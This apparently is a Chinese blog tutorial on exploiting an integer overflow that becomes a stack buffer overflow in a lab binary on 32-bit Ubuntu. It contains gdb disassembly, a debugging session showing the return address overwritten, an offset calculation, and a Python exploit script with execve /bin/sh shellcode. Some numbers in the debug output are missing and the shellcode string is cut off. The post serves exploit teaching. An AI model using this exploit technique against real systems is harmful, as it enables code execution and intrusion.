Linux Exploit系列之二 整数溢出

整数溢出

虚拟机安装：Ubuntu 12.04（x86）

什么是整数溢出？

存储大于最大支持值的值称为整数溢出。整数溢出本身不会导致任意代码执行，但整数溢出可能会导致堆栈溢出或堆溢出，这可能导致任意代码执行。在这篇文章中，我将仅谈论整数溢出导致堆栈溢出，整数溢出导致堆溢出将在后面的单独的帖子中讨论。

后边的内容复制粘贴好烦，还是说关键点吧！

原文见：https://bbs.pediy.com/thread-216869.htm

这个文章解释的比上一个清楚多了，相信能看懂，唯一不懂的，和上一篇估计一样，还是地址计算的问题

同样是使用gdb 调试：gdb -q vuln

下边解释下我是如何找地址的(虚拟机环境Ubuntu14.04 32位系统，gcc 4.8.2)

首先使用disassemble 查看汇编代码，看看程序的汇编代码布局：

 (gdb) disassemble validate_passwd
 Dump of assembler code for function validate_passwd:
    0x08048507 <+>:    push   %ebp
    0x08048508 <+>:    mov    %esp,%ebp
    0x0804850a <+>:    sub    $0x28,%esp
    0x0804850d <+>:    mov    0x8(%ebp),%eax
    0x08048510 <+>:    mov    %eax,(%esp)
    0x08048513 <+>:    call   0x80483e0 <strlen@plt>
    0x08048518 <+>:    mov    %al,-0x9(%ebp)
    0x0804851b <+>:    cmpb   $0x3,-0x9(%ebp)
    0x0804851f <+>:    jbe    0x8048554 <validate_passwd+>
    0x08048521 <+>:    cmpb   $0x8,-0x9(%ebp)
    0x08048525 <+>:    ja     0x8048554 <validate_passwd+>
    0x08048527 <+>:    movl   $0x8048670,(%esp)
    0x0804852e <+>:    call   0x80483b0 <puts@plt>
    0x08048533 <+>:    mov    0x804a040,%eax
    0x08048538 <+>:    mov    %eax,(%esp)
    0x0804853b <+>:    call   0x8048390 <fflush@plt>
    0x08048540 <+>:    mov    0x8(%ebp),%eax
    0x08048543 <+>:    mov    %eax,0x4(%esp)
    0x08048547 <+>:    lea    -0x14(%ebp),%eax
    0x0804854a <+>:    mov    %eax,(%esp)
    0x0804854d <+>:    call   0x80483a0 <strcpy@plt>

嗯，发现编译器改动不大，就是将strlen函数直接内嵌了，没有使用函数调用(库函数的惯用做法)，不多解释

(gdb) list 看一眼源码，方便下断点

(gdb) b validate_passwd 下断

然后开心的按照作者说的运行

下边是调试步骤

 Reading symbols from vuln...done.
 (gdb) b validate_passwd
 Breakpoint  at 0x804850d: file vuln.c, line .
 (gdb) r sploitfun `python -c 'print "A"*261'`
 Starting program: /home/jourluohua/work/test2/vuln sploitfun `python -c 'print "A"*261'`

 Breakpoint , validate_passwd (
     passwd=0xbffff6b6 'A' <repeats  times>...) at vuln.c:
      unsigned char passwd_len = strlen(passwd); /* [1] */
 (gdb) n　　　　　　　　//单步调试，想看看执行到了我们认为的关键的代码没有，很明显这儿还不是关键代码
      if(passwd_len >=  && passwd_len <= ) { /* [2] */
 (gdb) n
       printf("Valid Password\n"); /* [3] */
 (gdb) p passwd_len　　//这儿是关键处了，但是如果是正确的话，passwd_len 应该是'A',很可能是程序还没真正执行到
 $ =  '\005'
 (gdb) n
 Valid Password
       fflush(stdout);
 (gdb) n
       strcpy(passwd_buf,passwd); /* [4] */
 (gdb) n
      store_passwd_indb(passwd_buf); /* [6] */
 (gdb) p passwd_len　　　　//好终于到了我们想要的地方了
 $ =  'A'
 (gdb) p &passwd_len　　　//passwd_len的地址，既然利用的是栈，我们在乎的是内存布局
 $ = (unsigned char *) 0xbffff46f 'A' <repeats  times>...
 (gdb) p buf　　　　　　　　//手误，没有任何原因
 $ = 0x0
 (gdb) n
     }
 (gdb) p passwd_buf　　　　//passwd_buf的值也对了
 $ = 'A' <repeats  times>
 (gdb) p &passwd_buf[]　　//passwd_buf的地址也和我们想象的一样
 $ = 0xbffff464 'A' <repeats  times>...
 (gdb) p/x $eip　　　　　　//很明显还没有被覆盖
 $ = 0x8048578
 (gdb) p/x $ebp　　　　　　//这个真的不是在凑字数，ebp的地址很重要
 $ = 0xbffff478
 (gdb) n
 0x41414141 in ?? ()
 (gdb) p/x $eip　　　　　　//好，已经覆盖了
 $ = 0x41414141
 (gdb) p/x $ebp
 $ = 0x41414141
 (gdb) 

按照我上边的注释，相信大家对调试过程已经有了一定了解，现在说下地址的计算

$ebp - &passwd_buf[0] +4   = 0x18 = $eip - &passwd_buf[0]

这就是所谓的内存偏移，有了这个，我们的ret_addr就可以算出来了

ret_addr= 0xbffff464 +0x18 + 100

还是老规矩，附上我的exp.python 代码

 #exp.py
 #!/usr/bin/env python
 import struct
 from subprocess import call

 arg1 = "sploitfun"

 #Stack address where shellcode is copied.
 ret_addr = 0xbffff4e0

 #Spawn a shell
 #execve(/bin/sh)
 scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\$

 #endianess convertion
 def conv(num):
  return struct.pack("<I",num)#unk + RA + NOP's + Shellcode
 arg2 = "A" * 24
 arg2 += conv(ret_addr);
 arg2 += "\x90" * 100
 arg2 += scode
 arg2 += "C" * 108

 print "Calling vulnerable program"
 call(["./vuln", arg1, arg2])